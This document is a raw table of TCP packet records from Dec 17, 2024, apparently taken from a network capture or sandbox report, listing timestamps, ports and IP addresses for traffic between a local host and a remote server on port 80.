                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.346986055 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.347047091 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.347098112 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.347138882 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.349797010 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.349843979 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.349855900 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.349878073 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.352497101 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.352541924 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.352559090 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.352783918 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.355201006 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.355273962 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.355402946 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.355444908 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.357990026 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.358052015 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.358067989 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.358103991 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.360745907 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.360816002 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.360877991 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.360913992 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.363514900 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.363554955 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.363595963 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.363893032 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.366194963 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.366261005 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.366528034 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.366570950 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.368928909 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.368978977 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.368982077 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.369014978 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.371709108 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.371737957 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.371783018 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.374380112 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.374449968 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.374494076 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.374538898 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.377087116 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.377152920 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.377207041 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.377249002 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.379812956 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.379870892 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.379913092 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.379951000 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.382595062 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.382649899 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.382656097 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.382687092 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.385350943 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.385404110 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.385437012 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.385479927 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.388010979 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.388062000 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.388144016 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.388189077 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.390620947 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.390674114 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.390713930 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.390753984 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.393296003 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.393351078 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.393373013 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.393409967 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.447724104 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.447743893 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.447803020 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.448988914 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.449045897 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.449084044 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.449125051 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.451023102 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.451078892 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.451133013 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.451172113 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.453684092 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.453715086 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.453744888 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.454029083 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.456422091 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.456435919 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.456489086 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.508595943 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.508724928 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.508781910 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.508821011 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.509330988 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.509385109 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.509399891 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.509442091 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.510826111 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.510880947 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.511004925 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.511048079 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.512629986 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.512682915 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.512708902 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.512748957 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.513958931 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.514009953 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.514065027 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.514113903 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.515567064 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.515620947 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.515701056 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.515743971 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.517086983 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.517143011 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.517278910 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.517324924 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.518611908 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.518662930 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.518733025 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.518778086 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.520139933 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.520205975 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.520240068 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.520284891 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.521667004 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.521717072 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.521750927 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.521792889 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.523237944 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.523289919 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.523367882 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.523421049 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.524739027 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.524794102 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.524827003 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.524868011 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.526271105 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.526326895 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.526422024 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.526473045 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.527800083 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.527854919 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.527920008 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.527968884 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.529316902 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.529373884 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.529449940 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.529519081 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.530864954 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.530915022 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.530941010 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.530997992 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.532366037 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.532423019 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.532464981 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.532514095 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.533898115 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.533950090 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.534023046 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.534071922 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.535428047 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.535497904 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.535531998 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.535578966 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.536977053 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.537028074 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.537060976 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.537103891 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.538487911 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.538548946 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.538563013 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.538606882 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.539990902 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.540050983 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.540102959 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.540153980 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.541507959 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.541562080 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.541632891 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.541676044 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.543071985 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.543128014 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.543195009 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.543240070 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.544616938 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.544672012 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.544683933 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.544720888 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.546096087 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.546149969 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.546175957 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.546210051 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.547648907 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.547703981 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.547730923 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.547769070 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.549145937 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.549201012 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.549232960 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.549278021 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.550683975 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.550740004 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.550765038 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.550806046 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.552208900 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.552268028 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.552294970 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.552339077 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.553729057 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.553792000 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.553833961 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.553873062 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.555295944 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.555362940 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.555387020 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.555423975 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.556817055 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.556873083 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.556958914 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.557004929 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.558406115 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.558481932 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.558511972 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.558553934 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.559854031 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.559906960 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.559916973 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.559943914 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.561496019 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.561558008 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.561599970 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.561647892 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.562963009 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.563019991 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.563635111 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.563684940 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.564474106 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.564523935 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.564712048 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.564753056 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.566026926 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.566082954 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.566132069 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.566169024 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.567506075 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.567572117 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.567610979 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.567653894 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.568979979 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.569034100 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.569072962 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.569125891 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.570611000 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.570676088 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.570686102 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.570724010 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.572066069 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.572117090 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.572163105 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.572199106 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.573657990 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.573744059 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.573779106 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.573848009 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.575109005 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.575172901 CET4973880192.168.2.4138.124.60.133
